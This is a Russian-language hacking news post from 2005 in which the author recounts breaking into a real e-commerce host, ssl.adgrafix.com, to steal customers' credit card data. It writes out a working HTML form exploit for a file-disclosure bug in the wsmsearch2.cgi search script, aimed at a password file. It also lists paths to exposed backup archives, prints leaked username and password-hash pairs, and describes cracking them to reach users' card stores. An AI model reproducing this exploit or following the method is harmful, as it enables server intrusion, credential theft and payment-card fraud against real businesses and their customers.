СОДЕРЖАНИЕ:
  ДОМОЙ
  НОВОСТИ  
  IT АКАДЕМИЯ
  WAP-ВЕРСИЯ
  ФОРУМ
  БЕЗОПАСНОСТЬ
  ПРОГРАММИРОВАНИЕ
  ИНСТРУМЕНТ ВЕБМАСТЕРА
  ВСЁ ДЛЯ КПК
  СТАТЬИ NEW
  СОФТ
  ВИДЕО
  X-INFO
  ПРОКСИ ЛИСТ
  IT МУЗЫКА
  АНЕКДОТЫ
  ССЫЛКИ
  ТЕХ. ПОДДЕРЖКА
  ПРАВООБЛАДАТЕЛЯМ
  О НАС
ВАШ IP АДРЕС:
18.216.250.143
Человек на сайте На сайте: 142 человек(а)
Ђдминистрация никак не связан с авторами и содержимым ссылок
Рђеклама




Cервер : irc.comp-info.ru Порт : 6667 Канал : #comp-info


Архив Новостей  

Credit Card из ssl.adgrafix.com

14 сентября 2005 | ASSCOL | Архив Новостей

Ресурс ssl.adgrafix.com является хранилищем сотни небольших американских интернет-магазинов. Пройти мимо такого факта было нельзя. Тем более, что я обнаружил на этом сервере бажный поисковый скрипт (wsmsearch2.cgi),  позволяющий просматривать любой файл на сервере с правами сервера. О уязвимости подробнее смотреть здесь: http://www.lwb57.org/advisories/?adv=12

Но моя задача состояла в большем, получить доступ к юзерским хранилицам кредитных карт. Натравив на сервер DCS с самописной базой, я через некоторое время увидел, что директория /users/ открыта для просмотра, в ней лежали папки юзеров, естественно требующие авторизации. Но кроме этого тут же лежало несколько бекап-архивов юзерких папок, оказавшихся доступными для скачивания:

ssl.adgrafix.com/users/cedarsinn-secure.tar
ssl.adgrafix.com/users/diamonds-secure.tar
ssl.adgrafix.com/users/heavymetal-secure.tar
и т.д.

В их содержимом обнаружились кредитки, но самой большой находкой был файл .htaccess следующего содержания: 

AuthUserFile /opt/home2/adgrafix/securedir/heavymetalpw
AuthGroupFile /dev/null
AuthName «Secure Data Retrieval System»
AuthType Basic

<Limit GET POST>

require user heavymetal
</Limit> 


Внимание сразу привлек файл с паролем heavymetalpw, и самое главное тут был прописан путь до него. Оставалось в exploit добавить этот путь и я получил пароль юзера:

<form method=POST action="http://ssl.adgrafix.com/cgi-bin/wsmsearch2.cgi">
<B><FONT FACE="Arial,Helvetica"><FONT SIZE=-1>Search Site:</FONT></FONT><br></B>
<input type=text name="terms" size=20>
<input type=hidden name=boolean value="AND">
<input type=hidden name=case value="Insensitive">
<input type=hidden name=quicksearch value="NO">
<input type=hidden name=max value="50">
<input type=hidden name=faqfile value="/">
<input type=hidden name=resultspage value="/opt/home2/adgrafix/securedir/heavymetalpw">
<input type=submit value="Search!">


You are calling this script from a domain that is not registered with Adgrafix
Content-type: text/html heavymetal:.vGqzyBep5EDE bcroman:1b8HaV7PCqZc.

Кроме этого у меня уже был список юзеров этого ресурса, полученный с помощью того же скрипта, в который достаточно было ввести просто имя любого существующего юзера:

ssl.adgrafix.com/ssl_adgrafix_user_list.txt

Конечно можно было бы брать логины юзеров из папки /users/, но раз поисковик был очень добр и выдал мне сразу список логинов, я решил не напрягаться.

Часа через два я уже собрал все логины/пароли и скормил его john'у, через три дня у меня уже был доступ к половине юзерких хранилищ кред.

Комментариев: 0
Добавить комментарий

Ваше имя:  




Все материалы предоставляются как информация к размышлению. Лица, использующие данную информацию в противозаконных целях, могут быть привлечены к уголовной ответственности. Администрация сайта в этих случаях ответственности не несет.

/USR/MENU:
 ./HOME
 ./HOME/NEWS  
 ./HOME/IT_ACADEMY
 ./WAP
 ./FORUM
 ./SECURITY
 ./PROGRAMMING
 ./SOFT/4WEBMASTERS
 ./ALL4POCKETS
 ./USR/ARTICLESNEW
 ./TEMP/SOFT
 ./USR/ALL_VIDEO
 ./HOME/X-INFO
 ./TEMP/PROXYLIST
 ./IT_MUSIC
 ./JOKES
 ./HOME/LINKS
 ./USR/SUPPORT
 ./USR/POSSESSOR
 ./ABOUT_US
УТИЛИТЫ:

  Сниффер
  Лог сниффера
  MD5 и Base64
  Декодирование MD5 NEW
 Перекодировщик
  Проверить прокси
  Проверка анонимности
  Генерация пароля
  Скрипт определения IP
  Поиск информации
   Проверить IP (Whois)
   Узнать скорость закачки
   Добавить свой сайт в поисковые системы>
   Подсветка php-кода

ПОЛЕЗНАЯ ИНФОРМАЦИЯ:
  Список национальных доменных имен
  Компьютерные термины
  Смайлики
   Аналоги Win-программ в Linux
   Коды ответа HTTP сервера
   Записки невесты программиста

Опрос




Права на содержащиеся на сайте материалы принадлежат авторам.

Copyright Комп-Инфо.ру © 2005